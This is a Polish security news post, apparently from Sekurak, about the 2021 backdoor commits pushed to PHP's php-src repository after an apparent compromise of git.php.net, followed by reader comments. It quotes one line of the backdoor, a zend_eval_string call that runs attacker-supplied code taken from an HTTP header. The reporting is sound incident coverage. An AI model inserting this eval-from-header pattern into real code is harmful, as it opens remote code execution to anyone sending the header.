Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book
Wrzucono backdoora do kodu źródłowego PHP. Wygląda na włamanie na serwer Gita
O temacie jako jeden z pierwszych doniósł Bleepingcomputer. Do tematu ustosunkowała się również ekipa PHP:
28 marca 2021r. zostały wykonane do repozytorium php-src dwa „lewe” commity. Nie wiemy co się dokładnie wydarzyło, ale wszystko wskazuje na włamanie na serwer git.php.net
Yesterday (2021-03-28) two malicious commits were pushed to the php-src
repo [1] from the names of Rasmus Lerdorf and myself. We don’t yet know how exactly this happened, but everything points towards a compromise of the git.php.net server (rather than a compromise of an individual git account).
Złośliwa zmiana została opisana jako niewinna poprawka literówki, a co ciekawe zawiera również na oko podejrzany kod – m.in. coś takiego:
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");Całość wykonuje kod PHP z podesłanego przez atakującego nagłówka HTTP, o czym względnie szybko zorientowali się deweloperzy PHP:
–ms
Dlaczego ktoś wstawił tego stringa „REMOVETHIS: sold to zerodium, mid 2017”?
dwa oczywiste commity z oczywistym eval().
Zasłona dymna. tych „właściwych” zmian jeszcze się naszukacie
Z ciekawości aż wlazłem na ich serwer, żeby sprawdzić ilość i wielkość „commitów” … i jeśli cała ta podatność sprowadza się po prostu do możliwości dodania na bieżąco nowego „commita”, to mocno wątpię, by było czego szukać.